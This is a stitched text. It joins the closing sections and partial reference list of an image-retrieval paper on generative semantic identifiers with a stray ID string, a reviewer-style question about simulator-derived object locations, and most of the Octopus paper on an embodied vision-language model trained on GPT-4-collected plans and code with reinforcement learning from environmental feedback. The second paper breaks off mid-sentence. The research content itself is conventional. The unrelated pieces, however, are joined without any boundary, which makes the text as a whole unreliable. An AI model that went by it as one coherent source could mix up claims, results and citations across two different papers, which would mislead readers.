especially as the beam size increases. Additional time is consumed for checking the validity of predictions, as it’s possible that the predicted identifier may not exist in the database. Overall, the time cost is within an acceptable range. For instance, it takes approximately 0.07 seconds (with a beam size of 10) or 0.19 seconds (with a beam size of 30) per query. It’s important to highlight that our model operates as an end-to-end retrieval method, which doesn’t include the re-ranking step. In practical applications, re-ranking is typically necessary to achieve higher precision, but it can significantly increase the time required for the retrieval process. ### 4 RELATED WORK **Image retrieval.** Traditionally, hand-crafted features are heuristically designed to describe the image content based on its color ([Wengert et al., 2011]; [Wang & Hua, 2011]), texture ([Park et al., 2002](#)). or shape (Cao et al., 2011). Typical features include GIST (Siagian & Itti, 2007), SIFT (Lowe, 1999), SURF (Bay et al., 2006), VLAD (Jégou et al., 2010) and so on. Recent years have witnessed the explosive research on deep learning based features trained over labeled images. Besides the evolution of the network architecture designs (Krizhevsky et al., 2017; He et al., 2016; Vaswani et al., 2017), numerous efforts (Wieczorek et al., 2020; El-Nouby et al., 2021) have been dedicated to various loss functions including classification loss (Zhai & Wu, 2018; Zhou et al., 2019), triplet loss (Yuan et al., 2020), contrastive loss (Jun et al., 2019; El-Nouby et al., 2021), center loss (Wieczorek et al., 2020) and so on. The similarity between features can be calculated through some distance measure or evaluated through re-ranking techniques (Revaud et al., 2019). Another different line of research centers on approximate nearest neighbor search to speed up the search process, accepting a certain level of compromise in search accuracy. One way is to enable fast distance computation through hashing and quantization techniques such as LSH (Indyk & Motwani, 1998), min-Hash (Chum et al., 2008), ITQ (Gong et al., 2012), PQ (Jegou et al., 2010), and many others (Ge et al., 2013; Wang & Zhang, 2018; Zhu et al., 2016). The other way is to reduce the number of distance comparison by retrieving a small number of candidates. Typical methods include partition-based indexing (Babenko & Lempitsky, 2014b; Xia et al., 2013) that partitions the feature space into some non-overlapping clusters and graph-based indexing (Jayaram Subramanya et al., 2019) that builds a neighborhood graph with edges connecting similar images. To improve the recall rate while ensuring fast search speed, hierarchical course-to-fine strategy (Malkov & Yashunin, 2018) has been the popular choice that the retrieved candidates are refined level by level. Additionally, a number of excellent works have introduced hybrid indexing (Chen et al., 2021) that improves search by leveraging the best of both indexing schemes while avoiding their limitations. **Generative modeling.** Deep autoregressive networks are generative sequential models that assume a product rule for factoring the joint likelihood and model each conditional distribution through a neural network. AR models have shown extremely powerful progress in generative tasks across multiple domains such as images (Chen et al., 2020; Yu et al., 2022b), texts (Radford et al., 2019; Yang et al., 2019), audio (Dhariwal et al., 2020; Chung et al., 2019), and video (Wu et al., 2022; Weissenborn et al., 2019). The particular key component involves linearizing data into a sequence of symbols with notable works such as VQ-VAE (Van Den Oord et al., 2017), RQ-VAE (Lee et al., 2022a). Recently, a number of works (Tay et al., 2022; Wang et al., 2022b; De Cao et al., 2020) further explored the idea of using AR model to empower entity retrieval and document retrieval. Most related to our work are NCI (Wang et al., 2022b) and DSI (Tay et al., 2022), which are concerned with document retrieval. However, these approaches utilize hierarchical k-means clustering applied to document embeddings derived from a small pretrained language model to obtain document identifiers. In contrast, we put forward a novel approach that involves learning the identifier directly from semantic supervision, and we showcase its effectiveness in the context of image retrieval. We posit that this discovery can also be advantageous for document retrieval tasks. **5 Conclusion** In this paper, we delve into the realm of generative modeling to enhance end-to-end image retrieval, a process that directly connects a query image to its closest match. With the introduction of our semantic image tokenizer, we’ve demonstrated that our model excels at achieving remarkable precision without compromising recall. Through extensive ablation studies and evaluations on large-scale datasets, we’ve underscored the superior performance of our approach. We believe that this innovative approach to generative modeling in image retrieval not only pushes the boundaries of this field but also holds potential for broader applications. **Limitations.** While our model has shown significant performance improvements, it’s important to acknowledge its limitations, which can serve as avenues for future research. Although our model has demonstrated scalability to million-scale datasets, dealing with billion-scale datasets is a complex challenge. It may necessitate even larger models with higher capacity, potentially impacting inference speed. Striking a balance between model capacity and speed is an area that warrants exploration for efficient and effective billion-scale search. Training large autoregressive models requires substantial computational resources, which raises environmental concerns. Research efforts to enable efficient training, such as fast fine-tuning of pretrained models, are crucial to mitigate energy consumption and environmental impact. REFERENCES Daniel Adiwardana, Minh-Thang Luong, David R So, Jamie Hall, Noah Fiedel, Romal Thoppilan, Zi Yang, Apoorv Kulshreshtha, Gaurav Nemade, Yifeng Lu, et al. Towards a human-like open-domain chatbot. *arXiv preprint arXiv:2001.09977*, 2020. Jean-Baptiste Alayrac, Jeff Donahue, Pauline Luc, Antoine Miech, Iain Barr, Yana Hasson, Karel Lenc, Arthur Mensch, Katie Millican, Malcolm Reynolds, et al. Flamingo: a visual language model for few-shot learning. *arXiv preprint arXiv:2204.14198*, 2022. Ahmad Alzu’bi, Abbes Amira, and Naeem Ramzan. Semantic content-based image retrieval: A comprehensive study. *Journal of Visual Communication and Image Representation*, 32:20–54, 2015. Alexandr Andoni and Piotr Indyk. Near-optimal hashing algorithms for approximate nearest neighbor in high dimensions. *Communications of the ACM*, 51(1):117–122, 2008. Artem Babenko and Victor Lempitsky. Additive quantization for extreme vector compression. In *Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition*, pp. 931–938, 2014a. Artem Babenko and Victor Lempitsky. The inverted multi-index. *IEEE transactions on pattern analysis and machine intelligence*, 37(6):1247–1260, 2014b. Song Bai, Peng Tang, Philip HS Torr, and Longin Jan Latecki. Re-ranking via metric fusion for object retrieval and person re-identification. In *Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition*, pp. 740–749, 2019. Herbert Bay, Tinne Tuytelaars, and Luc Van Gool. Surf: Speeded up robust features. In *European conference on computer vision*, pp. 404–417. Springer, 2006. Yoshua Bengio, Nicholas Léonard, and Aaron Courville. Estimating or propagating gradients through stochastic neurons for conditional computation. *arXiv preprint arXiv:1308.3432*, 2013. Jon Louis Bentley. K-d trees for semidynamic point sets. In *Proceedings of the sixth annual symposium on Computational geometry*, pp. 187–197, 1990. Michele Bevilacqua, Giuseppe Ottaviano, Patrick Lewis, Wen-tau Yih, Sebastian Riedel, and Fabio Petroni. Autoregressive search engines: Generating substrings as document identifiers. *arXiv preprint arXiv:2204.10628*, 2022. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in neural information processing systems*, 33:1877–1901, 2020. Bingyi Cao, Andre Araujo, and Jack Sim. Unifying deep local and global features for image search. In *Computer Vision–ECCV 2020: 16th European Conference, Glasgow, UK, August 23–28, 2020, Proceedings, Part XX 16*, pp. 726–743. Springer, 2020. Yang Cao, Changhu Wang, Liqing Zhang, and Lei Zhang. Edgel index for large-scale sketch-based image search. In *CVPR 2011*, pp. 761–768. IEEE, 2011. Yue Cao, Mingsheng Long, Jianmin Wang, and Shichen Liu. Collective deep quantization for efficient cross-modal retrieval. In *Proceedings of the AAAI Conference on Artificial Intelligence*, volume 31, 2017. Mark Chen, Alec Radford, Rewon Child, Jeffrey Wu, Heewoo Jun, David Luan, and Ilya Sutskever. Generative pretraining from pixels. In *International conference on machine learning*, pp. 1691–1703. PMLR, 2020. Qi Chen, Bing Zhao, Haidong Wang, Mingqin Li, Chuanjie Liu, Zengzhong Li, Mao Yang, and Jingdong Wang. Spann: Highly-efficient billion-scale approximate nearest neighborhood search. *Advances in Neural Information Processing Systems*, 34:5199–5212, 2021.
VUA9LSmC2r
- When using GPT-4 plus a simulator to collect the dataset, the location of the target object is directly obtained from the simulator? And this information be stored and used for later training? With this approach, the final complete robotic system still needs a separate vision model besides the ViT-L in the VLM. Can the author give some discussion on this design choice?
LEARNING EMBODIED VISION-LANGUAGE PROGRAMMING FROM INSTRUCTION, EXPLORATION, AND ENVIRONMENTAL FEEDBACK Anonymous authors Paper under double-blind review Figure 1: Illustration of the functionality of our vision-language programmer, Octopus, in the developed OctoGTA environment. Given a task in the form of natural language, Octopus relies on its egocentric vision to generate plans and the corresponding executable code. ABSTRACT Large vision-language models (VLMs) have achieved substantial progress in multimodal perception and reasoning. Furthermore, when seamlessly integrated into an embodied agent, it signifies a crucial stride towards the creation of autonomous and context-aware systems capable of formulating plans and executing commands with precision. In this paper, we introduce Octopus, an embodied VLM designed to 1) proficiently decipher an agent’s visual and textual task objectives, 2) formulate intricate action sequences, and 3) generate executable code. Our design allows the agent to adeptly handle a wide spectrum of tasks, ranging from mundane daily chores in simulators to sophisticated interactions in complex video games. Octopus is trained by leveraging GPT-4 to control an explorative agent to generate training data, i.e., action blueprints and the corresponding executable code, within our experimental environment called OctoVerse. We also collect the feedback that allows the enhanced training scheme of Reinforcement Learning with Environmental Feedback (RLEF). Through a series of experiments, we illuminate Octopus’s functionality and present compelling results, and the proposed RLEF turns out to refine the agent’s decision-making. By open-sourcing our model architecture, simulator, and dataset, we aspire to ignite further innovation and foster collaborative applications within the broader embodied AI community. 1 INTRODUCTION With the rise of large language models (LLMs) (Radford et al., 2019; Brown et al., 2020; Ouyang et al., 2022; Touvron et al., 2023; Chiang et al., 2023), a subsequent surge in vision-language models (VLMs) emerged (Alayrac et al., 2022; Awadalla et al., 2023; Li et al., 2023d;b). This evolution has expanded machine capabilities, enabling tasks such as accurate image or video-based descriptions (Li et al., 2023d), reasoning (Xie et al., 2023; Chen et al., 2023), and conversations (Dai et al., 2023; Li et al., 2023b). In the realm of embodied AI, notable efforts like SayCan (Ahn et al., 2022), Palm-E (Driess et al., 2023), and RT-2 (Brohan et al., 2023) have trained on robot manipulation data, so that the agents process visual input and relay precise robotic motor control commands. Parallel to this robot manipulation approach, another methodology to interact with the environment focuses on task execution through code invocations. This paradigm mirrors our inherent human System-I stimuli, characterized by instinctive actions akin to predefined code. Conversely, the more contemplative System-II processes, which involve planning and reasoning, may be better suited for large models. For example, referring to Figure 1, planning a car ride with a pet might entail a subconscious checklist: `getOutOf()` the house, `check()` for the pet outside, `approach()` the pet, `letFollow()`, and then `open()` to `moveIn()` to the car. In fact, such a “programmatic” paradigm has been, although not in vision, leveraged by pioneering works such as ToolFormer (Schick et al., 2023), HuggingGPT (Shen et al., 2023), ViperGPT (Surís et al., 2023), and VisProg (Gupta & Kembhavi, 2023). They harness LLMs to craft programs and trigger relevant APIs. Game-centric models like Voyager (Wang et al., 2023) and Smallville (Park et al., 2023) have similarly employed GPT for function calls within game engines, though they often parse data directly from their environments. However, similar programming paradigms are unexplored when incorporating visual perception. Primary initiatives like TAPA (Wu et al., 2023) and SayPlan (Rana et al., 2023) can only output plans, which anchor their strategies in initial environmental states or employ dynamic scene graphs for LLM inputs, respectively. Despite their innovations, the seamless conversion of detailed plans into real-world actions is still missing. Another significant challenge is the over-reliance on pre-trained vision models to convert vision content into language, which can occasionally hinder the LLM’s performance. While EmbodiedGPT (Mu et al., 2023) addresses the problem by integrating vision-language modeling for planning and then transitioning to manipulation using policy mapping, the capability of embodied vision-language models to devise executable programs is still largely uncharted territory. This gap inspired our exploration. In this paper, we introduce Octopus, a novel embodied vision-language programmer. Figure 1 illustrates how this model integrates an agent’s visual perspective with textual task objectives to devise precise action sequences and yield executable code. To empower Octopus with its vision-centric programming capabilities, we leveraged GPT-4 to collect training data within our experimental realm, the OctoVerse. Here, GPT-4 was provided with intricate system messages, extensive environmental cues, and clearly defined objectives. Based on this input, GPT-4 formulated crucial action strategies and their associated code. Meanwhile, the agent operating in the OctoVerse captured its visual perspectives. Using collected data, Octopus stands out in generating code that seamlessly melds vision, language instruction, and action code. During the data collection phase, the agent, guided by GPT-4, concurrently receives feedback from simulators about the efficacy of each executed code step, discerning successful moves from unsuccessful ones. This led us to incorporate the Reinforcement Learning with Environmental Feedback (RLEF) approach into our pipeline. Successful steps earn rewards, which are then used to train a reward model. Leveraging these insights, we further fine-tune Octopus using Proximal Policy Optimization (PPO) (Schulman et al., 2017). This approach serves as a navigational beacon, sharpening the model’s decision-making accuracy.” Empirically, the proposed Octopus model showcases its adaptability and prowess in numerous testing scenarios, yielding promising results on not only routine tasks but also those that need reasoning capabilities. When pitted against existing models, Octopus emerges superior in task planning, code generation, and task execution, with its performance being notably enhanced after the RLEF integration. In sum, our key contributions include: Table 1: Overview of Related Embodied AI Models. The proposed Octopus distinguishes itself from other models as a unified vision-language model for both plan and code generation. | Models | Release Date | Supported Environment | Vision Model | Code Generator | Action w/ Feedback | LLM Training Enabled | |-----------------|--------------|-----------------------|--------------|----------------|--------------------|----------------------| | Text2Motion | Mar. 2023 | Sim | ✓ | ✓ | ✓ | | | Instruct2Act | May 2023 | Sim | ✓ | ✓ | | | | Lang2Rewards | Jun. 2023 | Sim | ✓ | ✓ | ✓ | | | VoxPoser | Jul. 2023 | Sim | ✓ | ✓ | | | | SayCan | Apr. 2022 | Real | ✓ | ✓ | | | | PALM-E | Mar. 2023 | Sim, Real | ✓ | ✓ | ✓ | | | RT-2 | Jul. 2023 | Real | ✓ | ✓ | ✓ | | | SayPlan | Jun. 2023 | Real | ✓ | ✓ | ✓ | | | EmbodiedGPT | May 2023 | Sim | ✓ | ✓ | ✓ | | | TaPA | Jul. 2023 | Sim | ✓ | ✓ | ✓ | | | Voyager | May 2023 | Game | ✓ | ✓ | ✓ | | | Octopus | Oct. 2023 | Sim, Game | ✓ | ✓ | ✓ | | • A novel embodied vision-language planner and programmer trained with Reinforcement Learning with Environmental Feedback (RLEF). • Two diverse and realistic embodied environments within the OctoVerse framework: (i) OctoGibson, which is developed upon OmniGibson (Li et al., 2023c), and (ii) OctoGTA, which is adapted from GTA-V (gta, 2014). Based on their platforms, we carefully design tasks and programming function libraries for Octopus. • Compelling results demonstrating the effectiveness of the integrated RLEF approach in Octopus and useful insights facilitating future research on visual planning and programming. 2 RELATED WORK 2.1 EMBODIED AI WITH LARGE MODELS The recent wave of research focuses on merging LLMs with embodied AI tasks (Radford et al., 2019; Brown et al., 2020; Ouyang et al., 2022; Touvron et al., 2023). For instance, VoxPoser addresses robotic manipulation problems through unsupervised methods (Huang et al., 2023b). A group of projects, namely SayCan (Ahn et al., 2022), Palm-E (Driess et al., 2023), RT-2 (Brohan et al., 2023), and EmbodiedGPT (Mu et al., 2023), effectively integrate visual or linguistic cues with robot manipulation data. Outside the domain of robotic manipulation, initiatives like Voyager (Wang et al., 2023) and Smallville (Park et al., 2023) harness the capabilities of GPT to interface with game functions, relying on preset functions to manage intricate manipulations. In a parallel vein, VisProg (Gupta & Kembhavi, 2023) leverages GPT-3 language prompts to craft Python programs, opening the door to a multitude of fascinating applications. While the proposed Octopus model also formulates plans and code, its distinguishing feature is the seamless integration of visual input in program and code generation. This also stands in contrast to other embodied planners like TAPA (Wu et al., 2023) and SayPlan (Rana et al., 2023), which deploy separate vision modules to translate visual data into linguistic inputs for LLMs. Octopus excels as a cohesive vision-language model, delivering not just plans but also executable code. 2.2 VISION-LANGUAGE MODELS Recent advances in large language models (LLMs) like GPTs (Radford et al., 2019; Brown et al., 2020; Ouyang et al., 2022), LLaMA (Touvron et al., 2023), and Vicuna (Chiang et al., 2023) have bolstered the performance of vision-language models, such as Flamingo (Alayrac et al., 2022; Awadalla et al., 2023) and BLIP-2 (Li et al., 2023d), particularly in zero-shot learning scenarios. To advance the conversation and interaction capabilities of vision-language models, researchers have begun exploring more. These include Otter (Li et al., 2023b), InstructBLIP (Dai et al., 2023), and LLava (Liu et al., 2023), among other noteworthy contributions (Ye et al., 2023; Zhou et al., 2022a; Li et al., 2023a). These models are specifically designed to facilitate complex human-model interactions and are particularly well-suited for use in multi-modal chatbots. Extended from Otter (Li et al., 2023b), we propose Octopus, the vision-language programming model designed to facilitate... human-model-agent interaction. Specifically, Octopus processes human instructions to generate action codes, enabling agents to execute operations accordingly. 2.3 Feedback in Large Language Models Reinforcement Learning with Human Feedback (RLHF) (Ouyang et al., 2022; Stiennon et al., 2020; Ziegler et al., 2019) is a modern approach in the field of AI that combines traditional reinforcement learning with feedback from human supervisors. (Sun et al., 2023) is the first successful adaptation of RLHF to vision-language alignment. In our research, we propose Reinforcement Learning with Environmental Feedback (RLEF), which harnesses the power of environmental feedback to train an embodied vision-language model. Instead of direct human supervision, the feedback in RLEF naturally comes from the simulator environment. 3 The OctoVerse Environment and Data Collection In this section, we present the simulator environments designed to train and assess the Octopus model. We then delve into our data collection techniques utilized within these environments and explain the detailed information of the data in training and test sets. 3.1 Overview of OctoVerse To train our Octopus model, we developed two simulator environments under the unified name of OctoVerse. Our primary environment is the OctoGibson simulator, from which we collect the training data and conduct our primary analysis. We then assess the model’s generalization capabilities in the OctoGTA simulator. OctoGibson We built the environment on the foundation of an existing simulation framework, OmniGibson (Li et al., 2023c), which supports 1,000 daily activities across 50 scenes, featuring over 5,000 meticulously annotated objects. To bolster model training, we incorporated 16 functions that the robot can execute, such as `walkTo()`. Within this environment, we meticulously crafted 476 tasks\(^1\). Each task begins with an initial state and concludes with a definitive termination state, allowing for a straightforward assessment of task completion. Among them, 367 tasks are routine tasks—simple and direct actions like “place a glass in a trash can”. Conversely, the remaining 109 are reasoning tasks which necessitate deeper comprehension. An example is “buy a chocolate”, where the agent needs to know to pick a chocolate bar from the shelf and then place it, along with money, on the checkout counter. To acquaint readers with our environment, Figure 2 (a-c) illustrates the task taxonomy and provides a word cloud. OctoGTA Our secondary environment, built on the foundation of GTA-V (gta, 2014), serves the purpose of auxiliary experiments, assessing the Octopus model’s generalizability. Within this set- --- \(^1\)The full list of task names and their categories are listed in this google sheet. Figure 3: Data Collection Example for “Cook a Bacon” Task. GPT-4 perceives the environment through the environmental message and produces anticipated plans and code in accordance with the detailed system message. This code is subsequently executed in the simulator, directing the agent to the subsequent state. For each state, we gather the environmental message, wherein observed objects and relations are substituted by egocentric images to serve as the training input. The response from GPT-4 acts as the training output. Environmental feedback, specifically the determination of whether each target state is met, is documented for RLEF training. Apart from the example in Figure 1, another example of such a task is “help NPC to drive their boat back to shore”. 3.2 INSTRUCTIONS FROM EXPLORATION Initiating the training of the Octopus model involves ensuring its operational capability, particularly its ability to process vision input, interpret current and past states (such as objects the agent is holding), and produce structured plans and executable code. Thus, the primary task in organizing training data is to form a succinct pairing: “vision input + current/historical states → next step plan + executable code”. However, collecting these pairs is far from simple; manually pairing them through human programmers would be both time-intensive and laborious. To circumvent this challenge, we harness the capabilities of GPT-4, not only to guide the agent’s actions for task attempts but also to facilitate the automated data-gathering process. Environment Info Collection As delineated in Figure 3 and Figure 4 (a), we harvest an environment message for each state, encompassing attributes like Observed Objects, Observed Relations, Inventory, and more. Specifically, the simulator can provide us with an exact scene graph at each state, shaping the content for the first two parts. The inventory info can be easily obtained in the simulator. The task, e.g., “cooking bacon” in Figure 3, is represented by the Task Goal. Automation with GPT-4 Having prepared the environment message, we next crafted a structured system message to ensure that the robot not only understands its input but also maintains a consistent output format. A detailed examination of this prompt can be found in the appendix. Experiments have shown that a well-articulated prompt --- We meticulously design tasks to be friendly, ensuring they exclude any inappropriate or violent behaviors. allows GPT-4 to effectively generate executable codes. It’s worth noting that the combined length of the system and environment messages can be extremely long. As a result, standard GPT-4 8K models may struggle to produce meaningful outputs, necessitating the use of the more robust GPT-4 32K model. As illustrated in Figure 3, when GPT-4 is fed a consistent system and environment message, it yields comprehensive outputs, encompassing current scenario analysis, planning, and actionable codes. The data will support the training in Section 4.2. **Error Management** Notably, GPT-4 collects training data under the main task of guiding the agent to complete tasks. However, GPT-4 is not infallible. Errors can manifest in multiple ways, ranging from syntax errors to physical challenges in the simulator. For instance, as depicted in Figure 3, between states #5 and #6, the action failed due to the long distance between the agent (bacon) and pan. Such setbacks reset the task to its previous state. If a task remains incomplete after 10 steps, it is deemed unsuccessful, and we terminate this task for budget concerns. All data pairs, regardless of the task’s completion status, are valuable resources for refining instructions. ### 3.3 ENVIRONMENTAL FEEDBACK While GPT-4 guides the agent toward task completion, its continual trial-and-error approach does more than just collect vision-output pairs. This iterative problem-solving provides a rich set of feedback data. The automatic annotation of the feedback is twofold, focusing on both step-level and task-level judgments. **Step-level judgment** assesses the alignment of post-execution states with their target states. For instance, in Figure 3, steps color-coded in green signify positive feedback. One can visualize the action sequence for task completion as a tree, where each node indicates a step (subtask), encapsulating an action code. Accompanying each step is a binary value that denotes success or failure, giving preference to the successful branch over its counterpart. **Task-level judgment**, on the other hand, gauges the successful execution of the overall task. If the task is not completed as intended, every state within that task is labeled as negative. This collated feedback data serves as a foundation for our Reinforcement Learning with Environmental Feedback (RLEF) methodology, which we discuss in greater detail in Section 4.3. ### 4 OCTOPUS: THE EMBODIED VISION-LANGUAGE PROGRAMMER In this section, we delineate the architecture and training methodologies underpinning Octopus, our novel vision-language programmer. Building upon the foundational principles of Otter (Li et al., 2023b), Octopus incorporates specialized modules to cater to the vision-language programming tasks within OctoVerse. We will elucidate the architectural design derived from the Otter model, detail the supervised fine-tuning approach that harnesses instructions from exploration, and explore the integration of reinforcement learning enhanced by environmental feedback. We refer to Figure 4 (b) which briefly illustrates the Octopus training pipeline. #### 4.1 ARCHITECTURE The Octopus architecture is heavily inspired by the foundation laid by the Otter model (Li et al., 2023b). However, in our adaptation, specialized modifications have been made to tailor the architecture for the unique challenges of vision-language programming tasks found in OctoVerse. At the core of Octopus is the seamless integration of two critical components: **MPT-7B Language Decoder** (MosaicML, 2023) and **CLIP ViT-L/14 Vision Encoder** (Radford et al., 2021). To further enhance the synergy between the vision and language components, we have incorporated design principles from the Flamingo architecture (Alayrac et al., 2022). This is evident in our employment of the **Perceiver Resampler module** and the intricate weaving of **Cross-Gated Attention modules**. Initially, the Perceiver Resampler module ingests a sequence of image or video features to produce a fixed set of visual tokens. Subsequently, these tokens condition the language layers through Cross-Gated Attention modules, where the tokens act as keys and values while text from preceding layers serves as queries. Through this detailed architecture, the Octopus is primed to excel in tasks that demand a nuanced understanding of both visual and textual data. 4.2 Supervised Finetuning with Instructions From Exploration We train the Octopus model on our collected dataset from OctoVerse \( D_E = \{(X_v, T_i, T_r)\} \) with token-level supervised fine-tuning (SFT) (Ouyang et al., 2022; Touvron et al., 2023). During training, the Perceiver Resampler transforms images \( X_v \) into visual tokens that are aligned with text modality in the language model layers. These visual tokens condition subsequent layers via Cross-Gated Attention modules. The training objective involves next-token prediction, akin to GPT series models (Brown et al., 2020; OpenAI, 2023), additionally with the incorporation of visual and textual inputs. The likelihood of a targeted response \( T_r \) is modeled as follows: \[ p(T_r | T_i, X_v) = \prod_{l=1}^{L} p(t_l | X_v, T_i, T_{r,<l}). \] Note that \( T_i \) denotes the instruction tokens and \( T_{r,<l} \) denotes the response tokens before the current predicted token \( t_l \). During inference, tokens are converted into natural language via the language decoder’s text tokenizer. In OctoVerse, visual observations are represented by \( X_v = \{x^0_F, \ldots, x^7_F, x^0_B, x^1_B\} \), consisting of eight first-person view (FPV) images followed by two bird’s-eye view (BEV) images. During training, this multi-image input \( X_v \) is treated as a continuous video frame sequence. The rationale behind capturing both FPV and BEV is twofold. Firstly, by capturing the FPV, we aim for the agent to mimic human-like processing, assimilating images it directly observes, much like how humans interpret their immediate surroundings. Secondly, the BEV is integrated because agents, unlike humans, can tap into alternative camera sources, such as surveillance cameras, granting a more holistic understanding of the environment. To obtain the eight FPV images, we capture one image every 45 degrees, ensuring a complete 360-degree perspective of the environment. 4.3 Reinforcement Learning with Environmental Feedback (RLEF) Within the OctoVerse ecosystem, as explained in Section 3.3 and Figure 3, we visualize task progression as a tree. Each node on this tree symbolizes a sub-task, and it carries a binary value, either \( \{0, 1\} \), to denote if the sub-task was successful or not. Simply put, if a node (or sub-task) has a value of 1, it is a step in the right direction toward our end goal. **Tree-based Task Representation** We organize these data into environmental reward datasets \( D_R = \{(X_v^*, T_i^*, T_r^*, c)\} \) where \( T_i^* \) and \( T_r^* \) are two responses on the tree with the same parental node’s task description \( T_i^* \), and \( c \) is the index of preferred response that could lead to final completion of the given task. The primary purpose of this step is to ensure that, when faced with two sub-tasks stemming from the same parent task, the reward mechanism favors the branch that is successfully executed. Note that even if a parental node does not have multiple responses, we can still assign feedback according to Section 3.3. **Reward Model Configuration** We finetune a single-modal CodeLLaMA-7B model on \( D_R \) with an additional value head as our reward model \( r_\phi \). For computational efficiency, the reward model is designed to accept only textual modality and outputs a scalar reward. The function of this text-based reward model is to assess state transitions, denoted by \( T_i^* \rightarrow T_{r,j}^* \), to determine which transitions yield higher rewards and thereby assist the agent in task execution and completion. **Policy Model Development** Next, we employ the above supervised fine-tuned model as the initial policy model (Ouyang et al., 2022) \( \pi_{\text{INIT}}^\theta \) with fixed parameters. Then we initialize another duplicate of the model as the RL-tuned model \( \pi_{\text{RL}}^\theta \), and train it with Proximal Policy Optimization (PPO) (Schulman et al., 2017) to maximize response rewards. The loss function is formulated as: \[ L(\pi_{\text{RL}}^\theta) = -E_{(X_v^*, T_i^*) \sim D_R, T_r \sim \pi_{\text{RL}}} [r_\phi(T_i^*, T_r) - \beta \cdot D_{KL}(\pi_{\text{RL}}(X_v^*, T_i^*) || \pi_{\text{INIT}}(X_v^*, T_i^*))], \] where \( \beta \) acts as a hyper-parameter to regulate the magnitude of the Kullback–Leibler (KL) penalty. 5 Experiments **Experimental Setup** We first set up the OctoGibson to evaluate the performance of Octopus and other related models. Specifically, we are utilizing the metrics of goal task completion score to check Table 2: **Main Results on OctoGibson.** We compare various models: standalone language models, adapted vision-language planners, and our Octopus models, across different evaluation settings. In cells displaying two values, the first represents the task completion rate across the target validation task sets, while the second assesses the conceptual accuracy of the model’s planning as judged by human evaluators. GT denotes that the model input is directly parsed from the simulator, with information on objects (O) or relations (R). Octopus shows consistently better results on task completion. | Model | Vision Model | Language Model | Entire Goal Task | |------------------------|--------------|----------------|------------------| | | | | Seen Env | Unseen Env | Follow | Reason | All | | LLaMA | GT (O+R) | LLaMA2-7B | 0.07 / 0.11 | 0.13 / 0.13 | 0.11 / 0.16 | 0.00 / 0.00 | 0.08 / 0.12 | | CodeLLaMA | GT (O+R) | CodeLLaMA-7B | 0.09 / 0.20 | 0.20 / 0.40 | 0.16 / 0.31 | 0.00 / 0.07 | 0.12 / 0.25 | | TAPA (task-level) | OVD GT (O) | CodeLLaMA-7B | 0.09 / 0.36 | 0.13 / 0.33 | 0.11 / 0.36 | 0.06 / 0.33 | 0.10 / 0.35 | | TAPA (step-level) | OVD GT (O) | CodeLLaMA-7B | **0.16** / **0.42** | 0.13 / 0.27 | **0.18** / **0.38** | 0.07 / 0.40 | 0.15 / 0.38 | | EmbodiedGPT | CLIP-ViT | MPT-7B | 0.04 / 0.36 | 0.27 / 0.53 | 0.13 / 0.38 | 0.00 / 0.40 | 0.10 / 0.40 | | Octopus (SFT Only) | CLIP-ViT | MPT-7B | 0.11 / 0.33 | 0.27 / 0.47 | 0.16 / 0.38 | 0.13 / 0.33 | 0.15 / 0.37 | | Octopus (SFT + RLEF) | CLIP-ViT | MPT-7B | 0.13 / 0.38 | **0.33** / **0.53** | **0.18** / **0.40** | **0.20** / **0.53** | **0.18** / **0.42** | whether the task is actually completed in the simulator and the plan score from human evaluation. We totally have 60 evaluation tasks, with 45 from the seen environment, and 15 that are unseen during training. We also have 45 routine tasks and 15 require reasoning. Please note that models like Octopus might not always accurately identify specific object names as they appear in the simulator (e.g., “water_bottle_189”). To address this, we implement a post-processing step for the generated code, substituting generic object references with their exact names from the simulator with simple string similarity matching. ### 5.1 Main Results **CodeLLaMA Improves Coding but not Planning.** The first two rows in Table 2 highlight the suboptimal task completion rate of the blind LLMs. Among them, CodeLLaMA boasts pre-training on a large programming dataset, resulting in a notable enhancement in code execution from our observation, with 92% of the written code being successfully executed compared to LLaMA’s 24%. However, its prowess in planning remains limited. In contrast, the proposed Octopus MPT-7B model displays superior planning and task completion metrics while maintaining commendable coding abilities (72% of the written code can be executed). We surmise that the coding requirements within the OctoGibson environment might not be exceedingly intricate, rendering an advanced programming language model, like CodeLLaMA, less crucial, albeit beneficial. For more insight, although not shown in the table, our efforts to replace the MPT model with CodeLLaMA encountered challenges of generating non-sense outputs, suggesting that more refined code, or image-code paired data might be necessary for a successful Octopus-CodeLLaMA integration. **Blind LLMs Struggle with Extended Input Content.** Our observations indicate that the step-level TAPA model, when supplied with a ground-truth object list, achieves a notable enhancement in planning. The primary distinction between it and the blind CodeLLaMA lies in the input length; the latter deals with protracted, pairwise relation content, complicating the language model’s ability to extract crucial data from the environment message. This scenario highlights the inherent limitation of blind LLMs: relying on language alone to convey the entirety of environmental data can result in unwieldy and less informative input. **Octopus Demonstrates Superior Task Generalization.** Table 2 underscores Octopus’s commendable performance, evidencing its consistent edge over standalone language models in task completion. Its adeptness in adapting to previously unencountered environments underlines the inherent advantages of vision-language models. A more detailed ablation analysis is provided in the subsequent section. **RLEF Enhances Octopus’s Planning Strategy.** Table 2 unequivocally underscores Octopus’s profound reasoning capabilities after the RLEF finetuning. An example can be observed in Figure A1(b-c), where, after refinement via RLEF, Octopus astutely navigates to the cabinet housing the carboy instead of attempting a direct yet distant capture. Quantitatively, Octopus exhibits enhanced adaptability to previously unseen reasoning tasks, reinforcing its prowess in logical task resolution. When juxtaposed with other strategies, such as the embodied queries employed by EmbodiedGPT, RLEF emerges as the more efficacious approach. Figure 5: Ablation Study on model components, model size, and vision input. For bars with different colors, the upper bar denotes the number of successful reasoning tasks, and the lower is routine tasks. 5.2 ABLATION STUDY 7B v.s. 3B Model Size We embarked on experiments centered on model size to discern the influence of the total parameter count on the efficacy of vision-language models. As illustrated in Figure 5 (a), downsizing the model manifests in a noticeable performance drop. The congruency of results across both the SFT and RLEF models underscores the importance of an apt model size when sculpting vision-language models. Examining Training Components Through experimentation on training components, we aimed to illuminate optimal strategies for finetuning vision-language models. Figure 5 (b) demonstrates that solely adjusting the connector culminates in success for merely 4 out of 60 tasks. Conversely, finetuning both the connector and language decoder nudges the success rate slightly higher, with 5 tasks being accomplished. In contrast to the fully optimized model, these outcomes accentuate the paramountcy of trained parameters. Significance of Visual Inputs in Task Performance In our standard configuration, the vision component processes a 